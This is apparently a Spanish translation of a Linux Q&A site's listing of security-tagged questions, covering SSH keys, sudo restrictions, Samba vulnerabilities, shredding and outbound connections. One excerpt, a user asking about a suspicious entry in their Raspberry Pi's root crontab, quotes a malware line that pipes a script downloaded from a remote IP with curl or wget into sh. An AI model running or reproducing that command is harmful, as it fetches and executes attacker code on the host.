Preguntas etiquetadas con security

Se supone que debo acceder a un servidor para vincular los servidores de puesta en marcha y en vivo de una empresa en nuestro bucle de implementación. Un administrador de su lado configuró las dos instancias y luego creó un usuario en el servidor para que podamos usar SSH como. …

73 ssh  security  key-authentication  administration 

Según un artículo de rapid7, hay algunas versiones vulnerables de Samba que permiten la ejecución remota de código en sistemas Linux: Si bien el gusano de rescate WannaCry impactó en los sistemas de Windows y fue fácilmente identificable, con pasos claros de corrección, la vulnerabilidad de Samba afectará a los …

73 linux  security  linux-kernel  samba 

Mi máquina es un servidor, por lo que quiero ignorar las conexiones que se realizan a mi servidor (por ejemplo, cuando alguien visita mi sitio web). Quiero ver solo conexiones / solicitudes realizadas por mi servidor a otros lugares. ¿Cómo veo solo esas conexiones salientes? EDITAR: Soy nuevo en este …

71 command-line  networking  shell-script  security 

Hace un tiempo noté que los nombres de usuario y contraseñas dados curlcomo argumentos de línea de comando no aparecen en la pssalida (aunque, por supuesto, pueden aparecer en su historial de bash). Tampoco aparecen en /proc/PID/cmdline. (Sin embargo, la longitud del argumento combinado de nombre de usuario / contraseña …

68 security  password  curl  ps  arguments 

Estamos teniendo un pequeño problema en un servidor. Queremos que algunos usuarios puedan hacerlo, por ejemplo, sudoy convertirse en root, pero con la restricción de que el usuario no puede cambiar la contraseña de root. Es decir, una garantía de que aún podemos iniciar sesión en ese servidor y convertirnos …

66 ubuntu  security  sudo 

¿Hay alguna forma de evitar que se agregue un comando a su historial? Tengo un comando que quiero mantener fuera de mi archivo de historial, y realmente no me importa tenerlo allí cuando busco el historial almacenado en la memoria, aunque eso es menos preocupante. ¿Hay alguna manera de evitar …

65 bash  security  zsh  command-history 

Actualmente trabajo de forma remota para varias organizaciones que necesitan que acceda a sus servidores regularmente para mantenimiento y actualizaciones. ¿Es seguro para mí agregar mi clave SSH pública RSA al .ssh/authorized_keysarchivo para permitirme iniciar sesión mucho más rápido / sin tener que buscar contraseñas? Opero bajo la presunción de …

60 ssh  security  key-authentication 

Estoy intentando mover algunas carpetas (como /vary /home) a una partición separada después de leer esta guía: 3.2.1 Elija un esquema de partición inteligente Pude mover una carpeta con éxito siguiendo esta guía. Sin embargo, no parece funcionar para varias carpetas, y todas mis carpetas se vuelcan en la partición …

59 debian  security  partition  fstab 

Quería agregar algo a mi archivo crontab raíz en mi Raspberry Pi, y encontré una entrada que me parece sospechosa, buscando partes de ella en Google no apareció nada. Entrada de Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Los contenidos de …

59 security  cron  malware 

Estoy ejecutando Chromium así: chromium --no-sandbox Estoy haciendo esto porque estoy ejecutando Debian Squeeze en un contenedor VM OpenVZ y es la única forma en que puedo hacer que funcione. Aunque sigo leyendo esto es terrible . Pero quiero saber por qué exactamente. ¿Puede alguien explicarmelo? ¿Alguien necesita piratear su …

54 security  chrome  browser  sandbox 

Esta es una curiosidad más ociosa que cualquier otra cosa. Un amigo mío me preguntó '¿qué rango de puertos es el que solo la raíz puede usar en Linux?' Le dije que 0-1024 estaban restringidos. Luego me preguntó por qué era así y ... estaba perdido. No tengo idea alguna. …

53 networking  security  root  tcp 

Mi archivo .muttrc se parece a este o ver más abajo un vistazo. Dudo con la contraseña. ¿Cómo debo guardar mi contraseña para usarla mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real …

52 security  mutt 

He generado y descargado una .pemclave privada de AWS. Sin embargo, para usar Putty para conectarse a la máquina virtual, debo tener esa clave en .ppkformato. El proceso de conversión se detalla en aproximadamente 20 líneas aquí: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Estoy usando Linux Mint (una distribución de Ubuntu) y sé que puedo …

49 ssh  linux-mint  security  putty  amazon-ec2 

Tengo un árbol de directorios que me gustaría destruir con la utilidad 'triturar' de Linux. Desafortunadamente, la trituración no tiene -Ropción para la trituración recursiva. ¿Cómo puedo triturar un árbol de directorios completo de forma recursiva?

48 security  rm  data-destruction 

Tengo un proceso que escucha 2 puertos: 45136 / tcp y 37208 / udp (en realidad supongo que es el mismo proceso). Pero netstat no devuelve ningún pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Mismo resultado con "grep 37208". También probé lsof: lsof -i …

47 networking  security  process